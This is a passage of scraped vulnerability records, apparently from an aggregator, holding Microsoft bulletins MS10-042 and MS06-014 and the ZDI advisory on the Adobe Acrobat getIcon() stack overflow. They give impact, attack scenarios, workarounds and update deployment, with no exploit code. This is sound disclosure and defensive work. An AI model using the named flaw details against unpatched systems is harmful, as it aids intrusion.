protocol can be used to execute URL links to open the Help and Support Center feature.\r\n\r\nAre third-party applications directly affected by this issue? \r\nNo. However, this issue may be exploited through Web transactions, regardless of web browser type. In a Web-based attack scenario, an attacker would have to host a Web page that contains a specially crafted URI. Any application that is capable of handling the HCP protocol may be used as a vector to exploit this issue.\r\n\r\nWhy is this vulnerability rated as a lower severity on Windows Server 2003? \r\nThe vulnerability exists in Windows Server 2003, but we have not found a method for exploiting the vulnerability remotely on servers running Windows Server 2003. Nevertheless, this update addresses the vulnerability for Windows Server 2003 to remove the described threat of a remote vector.\r\n\r\nWhat is a URI? \r\nA Uniform Resource Identifier (URI) is a string of characters used to act on or identify resources from the Internet or over a network. A URL is a typical example of a URI that references a resource such as a Web site. For more information about URIs, see RFC-2396.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nIf a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through a Web browser and then convince a user to view the Web site. This can also include compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger request that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nWindows XP systems are primarily at risk from this vulnerability. Windows Server 2003 systems are also at risk, but we have not been able to find a way to exploit this issue remotely on Windows Server 2003.\r\n\r\nWhat does the update do? \r\nThis update addresses this vulnerability by modifying the manner in which data is validated when passed to the Windows Help and Support Center.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-1885. The vulnerability was first described in Microsoft Security Advisory 2219475.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nYes. Microsoft is aware of active attacks attempting to exploit the vulnerability. Based on the samples analyzed, Windows Server 2003 systems are not currently at risk from these attacks.\r\n\r\nOther Information\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\nTop of sectionTop of section\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (July 13, 2010): Bulletin published.", "edition": 1, "modified": "2010-07-14T00:00:00", "published": "2010-07-14T00:00:00", "id": "SECURITYVULNS:DOC:24211", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24211", "title": "Microsoft Security Bulletin MS10-042 - Critical Vulnerability in Help and Support Center Could Allow Remote Code Execution (2229593)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:29", "bulletinFamily": "software", "cvelist": ["CVE-2009-0927"], "description": "ZDI-09-014: Adobe Acrobat getIcon() Stack Overflow Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-014\r\nMarch 24, 2009\r\n\r\n-- CVE ID:\r\nCVE-2009-0927\r\n\r\n-- Affected Vendors:\r\nAdobe\r\n\r\n-- Affected Products:\r\nAdobe Acrobat\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 6255.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Adobe Acrobat and Adobe Reader. User\r\ninteraction is required in that a user must visit a malicious web site\r\nor open a malicious file.\r\n\r\nThe specific flaw exists when processing malicious JavaScript contained\r\nin a PDF document. When supplying a specially crafted argument to the\r\ngetIcon() method of a Collab object, proper bounds checking is not\r\nperformed resulting in a stack overflow. If successfully exploited full\r\ncontrol of the affected machine running under the credentials of the\r\ncurrently logged in user can be achieved.\r\n\r\n-- Vendor Response:\r\nAdobe has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb09-04.html\r\n\r\n-- Disclosure Timeline:\r\n2008-07-03 - Vulnerability reported to vendor\r\n2009-03-24 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Tenable Network Security\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "edition": 1, "modified": "2009-03-25T00:00:00", "published": "2009-03-25T00:00:00", "id": "SECURITYVULNS:DOC:21522", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21522", "title": "ZDI-09-014: Adobe Acrobat getIcon() Stack Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:17", "bulletinFamily": "software", "cvelist": ["CVE-2006-0003"], "description": "Microsoft Security Bulletin MS06-014\r\nVulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)\r\nPublished: April 11, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho should read this document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update at the earliest opportunity.\r\n\r\nSecurity Update Replacement: None\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1 running Microsoft Data Access Components 2.7 Service Pack 1 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 2 running Microsoft Data Access Components 2.8 Service Pack 1 \u2013 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition running Microsoft Data Access Components 2.8 Service Pack 2 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 running Microsoft Data Access Components 2.8 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 Service Pack 1 running Microsoft Data Access Components 2.8 Service Pack 2 \u2013 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems running Microsoft Data Access Components 2.8 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 with SP1 for Itanium-based Systems running Microsoft Data Access Components 2.8 Service Pack 2 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition running Microsoft Data Access Components 2.8 Service Pack 2 - Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME) \u2013 Review the FAQ section of this bulletin for details about these operating systems.\r\n\r\nTested Microsoft Windows Components:\r\n\r\nAffected Components:\r\n\u2022\t\r\n\r\nWindows 2000 Service Pack 4 with Microsoft Data Access Components 2.5 Service Pack 3 installed - Download the update\r\n\u2022\t\r\n\r\nWindows 2000 Service Pack 4 with Microsoft Data Access Components 2.7 Service Pack 1 installed- Download the update\r\n\u2022\t\r\n\r\nWindows 2000 Service Pack 4 with Microsoft Data Access Components 2.8 installed - Download the update\r\n\u2022\t\r\n\r\nWindows 2000 Service Pack 4 with Microsoft Data Access Components 2.8 Service Pack 1 installed - Download the update\r\n\u2022\t\r\n\r\nWindows XP Service Pack 1 with Microsoft Data Access Components 2.8 installed - Download the update\r\n\r\nNote The \u201cAffected Software\u201d section applies to MDAC that shipped with a Microsoft Windows operating system. The \u201cAffected Components\u201d section applies to MDAC that was downloaded and installed onto a Microsoft Windows operating system.\r\n\r\nNote Microsoft strongly recommends that all customers who currently use a version of Windows that does not have Microsoft Data Access Components 2.7 Service Pack 1 or higher upgrade immediately to Microsoft Data Access Components 2.8 Service Pack 1 or another supported version. The only exception to this notice is customers who currently use Windows 2000 Service Pack 4 running Microsoft Data Access Components 2.5 Service Pack 3. See Knowledge Base Article 915387 for more information.\r\n\r\nNote The security updates for Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 also apply to Microsoft Windows Server 2003 R2.\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a newly-discovered, privately-reported vulnerability. The vulnerability is documented in the \u201cVulnerability Details\u201d section of this bulletin.\r\n\r\nIf a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWe recommend that customers apply the update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tWindows 98,Windows 98 SE and Windows ME\tWindows 2000 Service Pack 4\tWindows XP Service Pack 1 and Windows XP Service Pack 2\tWindows Server 2003 and Windows Server 2003 Service Pack 1\r\n\r\nMicrosoft Windows MDAC Vulnerability - CVE-2006-0003\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nModerate\r\n\r\nNote All versions of Microsoft Data Access Components (MDAC) for the affected operating system have the same severity rating of Critical.\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote The severity ratings for non-x86 operating system versions map to the x86 operating systems versions as follows:\r\n\u2022\t\r\n\r\nThe Microsoft Windows XP Professional x64 Edition severity rating is the same as the Windows XP Service Pack 2 severity rating.\r\n\u2022\t\r\n\r\nThe Microsoft Windows Server 2003 R2 Systems severity rating is the same as the Windows Server 2003 severity rating.\r\n\u2022\t\r\n\r\nThe Microsoft Windows Server 2003 for Itanium-based Systems severity rating is the same as the Windows Server 2003 severity rating.\r\n\u2022\t\r\n\r\nThe Microsoft Windows Server 2003 with SP1 for Itanium-based Systems severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\u2022\t\r\n\r\nThe Microsoft Windows Server 2003 x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\nTop of sectionTop of section\r\n\t\r\nFrequently asked questions (FAQ) related to this security update\r\n\r\nCan I detect what version of MDAC is installed on my system?\r\nYes, there is a tool available that you can use to determine the version of MDAC that you have installed on your system. For more information about how to install and use this tool, see Microsoft Knowledge Base Article 301202. For information about the different MDAC versions that are available and the products that install them, see Microsoft Knowledge Base Article 231943.\r\n\r\nI am currently using Microsoft Data Access Components 2.6 or 2.6 Service Pack 1. Why do I need to upgrade to version 2.8 Service Pack 1 of Microsoft Data Access Components?\r\nMicrosoft Data Access Components 2.6 and Microsoft Data Access Components 2.6 Service Pack 1 have reached the end of their support life cycles. It should be a priority for customers who have these versions to migrate to the supported version. The supported version is Microsoft Data Access Components 2.8 Service Pack 1.\r\n\r\nDoes this update contain any changes to functionality?\r\nYes. The RDS.Dataspace ActiveX control that is provided in MDAC contains additional restrictions that affect the way that it interacts within Internet Explorer. These restrictions may interfere with the normal operation of some applications if those applications load the RDS.Database ActiveX control within Internet Explorer.\r\n\r\nWhat is the Internet Explorer Enhanced Security Configuration?\r\nInternet Explorer Enhanced Security Configuration is a group of preconfigured Internet Explorer settings that reduce the likelihood of a user or of an administrator downloading and running malicious Web content on a server. Internet Explorer Enhanced Security Configuration reduces this risk by modifying many security-related settings. This includes the settings on the Security tab and the Advanced tab in the Internet Options dialog box. Some of the important modifications include the following:\r\n\u2022\t\r\n\r\nSecurity level for the Internet zone is set to High. This setting disables scripts, ActiveX controls, Microsoft Java Virtual Machine (MSJVM), and file downloads.\r\n\u2022\t\r\n\r\nAutomatic detection of intranet sites is disabled. This setting assigns all intranet Web sites and all Universal Naming Convention (UNC) paths that are not explicitly listed in the Local intranet zone to the Internet zone.\r\n\u2022\t\r\n\r\nInstall On Demand and non-Microsoft browser extensions are disabled. This setting prevents Web pages from automatically installing components and prevents non-Microsoft extensions from running.\r\n\u2022\t\r\n\r\nMultimedia content is disabled. This setting prevents music, animations, and video clips from running.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. I am still using one of these operating systems, what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require additional support for Windows NT 4.0 Service Pack 6a and Windows 2000 Service Pack 3 must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager.\r\n\r\nFor more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nAre Windows 98, Windows 98 Second Edition, or Windows Millennium Edition critically affected by one or more of the vulnerabilities that are addressed in this security bulletin?\r\nYes. Windows 98, Windows 98 Second Edition, and Windows Millennium Edition are critically affected by this vulnerability. These security updates are available for download from the Windows Update Web site. For more information about severity ratings, visit the following Web site.\r\n\r\nNote Updates for localized versions of Microsoft Windows Millennium Edition that are not supported by Windows Update are available for download at the following download locations:\r\n\u2022\t\r\n\r\nSlovenian \u2013 Download the update\r\n\u2022\t\r\n\r\nSlovakian \u2013 Download the update\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) 1.2.1 to determine whether this update is required?\r\nYes. MBSA 1.2.1 will determine whether this update is required for Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1.\r\n\r\nMBSA 1.2.1 does not support the detection of MDAC on Windows 2000 Service Pack 4, on Windows XP Service Pack 1, and on Windows Server 2003. For more information about MBSA, visit the MBSA Web site. For more information about the programs that MBSA 1.2.1 currently does not detect, see Microsoft Knowledge Base Article 306460. However, Microsoft has developed a version of the Enterprise Scan Tool (EST) that will help customers determine whether the security updates provided in this security bulletin are required. For more information, see the "Can I use a version of the Enterprise Scan Tool (EST) to determine whether this update is required?" question.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) 2.0 to determine whether this update is required?\r\nYes. MBSA 2.0 will determine whether this update is required. MBSA 2.0 can detect security updates for products that Microsoft Update supports. For more information about MBSA, visit the MBSA Web site.\r\n\r\nWhat is the Enterprise Update Scanning Tool (EST)?\r\nAs part of an ongoing commitment to provide detection tools for bulletin-class security updates, Microsoft delivers a stand-alone detection tool whenever the Microsoft Baseline Security Analyzer (MBSA) and the Office Detection Tool (ODT) cannot detect whether the update is required for an MSRC release cycle. This stand-alone tool is called the Enterprise Scan Tool (EST) and is designed for enterprise administrators. When a version of the Enterprise Update Scanning Tool is created for a specific bulletin, customers can run the tool from a command line interface (CLI) and view the results of the XML output file. To help customers better utilize the tool, detailed documentation will be provided with the tool. There is also a version of the tool that offers an integrated experience for SMS administrators.\r\n\r\nCan I use a version of the Enterprise Update Scanning Tool (EST) to determine whether this update is required?\r\nYes. Microsoft has created a version of the EST that will determine if you have to apply this update. For download links and more information about the version of the EST that is being released this month, see the following Microsoft Web site. SMS customers should review the "Can I use Systems Management Server (SMS) to determine whether this update is required?" FAQ for more information about SMS and EST.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nYes. SMS can help detect and deploy this security update.\r\n\r\nSMS can use the SMS Software Update Services (SUS) Feature Pack to detect security updates. The SMS SUS Feature Pack includes the Security Update Inventory Tool (SUIT). For more information about the Security Update Inventory Tool, visit the following Microsoft Web site. For more information about the limitations of the Security Update Inventory Tool, see Microsoft Knowledge Base Article 306460.\r\n\r\nThe SMS SUS Feature Pack also includes the Microsoft Office Inventory Tool to detect for required updates for Microsoft Office applications.\r\n\r\nSMS can use the SMS 2003 Inventory Tool for Microsoft Updates to detect security updates that are offered by Microsoft Update and that are supported by Windows Server Update Services. For more information about the SMS 2003 Inventory Tool for Microsoft Updates, visit the following Microsoft Web site.\r\n\r\nSMS 2.0 and SMS 2003 customers who do not use the SMS 2003 Inventory Tool for Microsoft Updates must download and deploy an updated version of the Extended Security Update Inventory Tool to receive full detection and deployment for this update.\r\n\r\nFor more information about SMS, visit the SMS Web site.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nMicrosoft Windows MDAC Vulnerability - CVE-2006-0003:\r\n\r\nA remote code execution vulnerability exists in the RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\t\r\nMitigating Factors for Microsoft Windows MDAC Vulnerability - CVE-2006-0003:\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to attempt to exploit this vulnerability. An attacker would have no way to force users to visit a malicious Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site. It could also be possible to display malicious Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. This mode mitigates this vulnerability in the e-mail vector because reading e-mail messages in plain text is the default configuration for Outlook Express. See the FAQ section of this security update for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Microsoft Windows MDAC Vulnerability - CVE-2006-0003:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\t\r\nDisable the RDS.Dataspace ActiveX control from running within Internet Explorer\r\n\r\nDisable attempts to instantiate the RDS.Dataspace ActiveX control in Internet Explorer by setting the kill bit for the control.\r\n\r\nWarning If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.\r\n\r\nFor example, to set the kill bit for a CLSID for this object, paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BD96C556-65A3-11D0-983A-00C04FC29E36}]"Compatibility Flags"=dword: 00000400\r\n\r\nNote For more information about how to prevent a control from running in Internet Explorer, see Microsoft Knowledge Base Article 240797. Follow the procedure that this article provides to create a Compatibility Flags value in the registry. By doing this, you will prevent the RDS.Dataspace ActiveX control from being instantiated in Internet Explorer.\r\n\r\nImpact of Workaround: Any Web-based application that requires the RDS control to be instantiated within Internet Explorer will no longer function correctly.\r\nTop of sectionTop of section\r\n\t\r\nSet Internet and Local intranet security zone settings to \u201cHigh\u201d to prompt before running ActiveX controls in these zones\r\n\r\nYou can help protect against this vulnerability by changing your settings for the Internet security zone to prompt before running ActiveX controls. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Microsoft Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nRepeat steps 1 through 3 for the Local intranet security zone by clicking on the Local intranet icon.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of Workaround: User will be prompted prior to running ActiveX controls unless the Web site is in the user\u2019s list of trusted sites.\r\nTop of sectionTop of section\r\n\t\r\nConfigure Internet Explorer to prompt before running ActiveX controls or disable ActiveX controls in the Internet and Local intranet security zone\r\n\r\nYou can help protect against this vulnerability by changing your settings to prompt before running ActiveX controls or disable ActiveX controls in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nClick Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Run ActiveX controls and plug-ins, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Run ActiveX controls and plug-ins, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nImpact of Workaround: There are side effects to prompting before running ActiveX controls. Many Web sites that are on the Internet or on an intranet use ActiveX to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX controls to provide menus, ordering forms, or even account statements. Prompting before running ActiveX controls is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run ActiveX controls.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Microsoft Windows MDAC Vulnerability - CVE-2006-0003:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system.\r\n\r\nIf a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability?\r\nUnder certain conditions, the RDS.Dataspace ActiveX control fails to ensure that it interacts safely when it is hosted on a Web page.\r\n\r\nWhat is Remote Data Services (RDS)?\r\nRemote Data Service (RDS) is a feature of ADO. You can use RDS to move data from a server to a client application or to a Web page, to manipulate the data on the client, and to return updates to the server in a single round trip.\r\n\r\nWho could exploit the vulnerability?\r\nAn attacker could create an e-mail message that is specially crafted to try to exploit this vulnerability. An attacker could exploit the vulnerability by sending this specially crafted e-mail message to a user of a server that is running an affected software application. An attacker could then persuade the user to click a link in the e-mail message. In a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to attempt to exploit this vulnerability. An attacker would have no way to force users to visit a malicious Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site. It could also be possible to display malicious Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nThis vulnerability requires that a user is logged on and reading e-mail messages or is visiting Web sites for any malicious action to occur. Therefore, any systems where e-mail messages are read or where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by applying additional restrictions to the behavior of the RDS.Dataspace ActiveX control when it is hosted on a Web page.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nSecurity Update Information\r\n\r\nAffected Software:\r\n\r\nFor information about the specific security update for your affected software, click the appropriate link:\r\n\t\r\nWindows Server 2003 (all versions)\r\n\r\nPrerequisites\r\nThis security update requires Windows Server 2003 or Windows Server 2003 Service Pack 1.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches.\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode. This is the same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDoes not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestarts the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/overwriteoem\r\n\t\r\n\r\nOverwrites OEM files without prompting\r\n\r\n/nobackup\r\n\t\r\n\r\nDoes not back up files needed for uninstall\r\n\r\n/forceappsclose\r\n\t\r\n\r\nForces other programs to close when the computer shuts down\r\n\r\n/log: path\r\n\t\r\n\r\nAllows the redirection of installation log files\r\n\r\n/integrate:path\r\n\t\r\n\r\nIntegrates the update into the Windows source files. These files are located at the path that is specified in the switch.\r\n\r\n/extract[:path]\r\n\t\r\n\r\nExtracts files without starting the Setup program\r\n\r\n/ER\r\n\t\r\n\r\nEnables extended error reporting\r\n\r\n/verbose\r\n\t\r\n\r\nEnables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports many of the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\nNote If you are unsure of the version of MDAC you are running, install the Component Checker.\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows Server 2003:\r\n\r\nWindowsserver2003-kb911562-x86-enu /quiet\r\n\r\nNote Use of the /quiet switch will suppress all messages. This includes suppressing failure messages. Administrators should use one of the supported methods to verify the installation was successful when they use the /quiet switch. Administrators should also review the KB911562.log file for any failure messages when they use this switch.\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows Server 2003:\r\n\r\nWindowsserver2003-kb911562-x86-enu /norestart\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site. For more information about how to deploy this security update using Windows Server Update 